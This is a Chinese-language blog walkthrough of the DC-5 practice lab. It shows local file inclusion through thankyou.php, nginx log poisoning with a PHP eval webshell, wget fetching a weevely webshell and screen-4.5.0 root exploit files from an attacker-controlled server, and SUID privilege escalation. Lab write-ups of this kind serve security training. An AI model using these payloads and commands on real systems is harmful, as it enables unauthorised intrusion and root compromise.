【安全靶场】-DC-5

❤️博客主页iknow181
🔥系列专栏网络安全PythonJavaSEJavaWebCCNP
🎉欢迎大家点赞👍收藏⭐评论✍


一、收集信息

1.用burp测试穷尽文件名

使用两个字典

发现footer页面

可能存在文件包含,因为contact.php里面的内容和footer.php内容一样

2.判断文件包含的参数名是什么

GET /thankyou.php?§a§=§hah§ HTTP/1.1

使用cluster bomb模式

第一个payload

第二个payload

穷举发现前面参数名为file=

3.穷举看有什么东西可以被文件包含

GET /thankyou.php?file=§x.php§ HTTP/1.1

使用Fuzzing,指可能出现的情况

发现/etc/pass可以被文件包含进来的

4.查看nginx的日志

二、查找漏洞

1.测试日志

发现信息会被记录到日志里,那么我们就可以写一句话木马进去

2.打开kali的burp

在burp中提交的都是原汁原味的,不会进行url解码

写入一个一句话木马

/wocao! <?php @eval($_GET['a']);?>

如果发送后,在日志里的wocao!后面没有php代码,说明注入成功了

之后访问

/thankyou.php?file=/var/log/nginx/access.log&a=phpinfo();

发现可以执行

3.生成一个web木马

最好直接在root目录下生成

weevely generate 123456 haha.php

提高权限

4.开启一个python http服务器

目的是让目标来我这边下载木马

python -m http.server

5.文件包含漏洞下载木马

/thankyou.php?file=/var/log/nginx/access.log&a=system('cd /tmp;wget 【木马地址】;chmod +x haha.php')

包含木马

/thankyou.php?file=/tmp/haha.php

kali链接木马

weebely http://172.20.10.14/thankyou.php?file=/tmp/haha.php

三、提权

这时已经进入目标主机上了

1.发现有哪些命令可以提权

find / -perm 4000 2>/dev/null

发现screen-4.5.0

2.搜索screen有什么漏洞

3.将漏洞拷贝到本地

41152.sh是一个分段的编译程序

每个 EOF代表一段话的结束

4.利用漏洞

将这个代码复制到libhax.c的文件

然后用这条命令进行编译

这个代码复制到rootshell.c的文件

编译

最后一段是sh命令,新建一个sh文件

5.将编译好的木马传到目标上去

进入刚才的weevely

cd /tmp

wget http://192.168.43.91:8000/libhax.so

wget http://192.168.43.91:8000/rootshell

wget http://192.168.43.91:8000/runme.sh

加权限

提取成功

相关推荐
m0_4665252923 分钟前
绿盟科技风云卫AI安全能力平台成果重磅发布
大数据·数据库·人工智能·安全
晚霞的不甘1 小时前
守护智能边界:CANN 的 AI 安全机制深度解析
人工智能·安全·语言模型·自然语言处理·前端框架
枷锁—sha1 小时前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
数字护盾(和中)1 小时前
信创生态 + 国密算法 筑牢数字安全韧性根基
安全
devmoon2 小时前
在 Polkadot 上部署独立区块链Paseo 测试网实战部署指南
开发语言·安全·区块链·polkadot·erc-20·测试网·独立链
成茂峰2 小时前
软考高级·系统架构设计师 | 四、信息技术安全知识
安全·信息安全·系统架构·架构设计师
向哆哆2 小时前
CANN生态安全保障:cann-security-module技术解读
人工智能·安全·cann
wuli_滔滔3 小时前
CANN安全机制源码探秘 仓库中的权限校验与数据加密实现
安全·cann
liann1194 小时前
3.1_网络——基础
网络·安全·web安全·http·网络安全
独行soc4 小时前
2026年渗透测试面试题总结-17(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮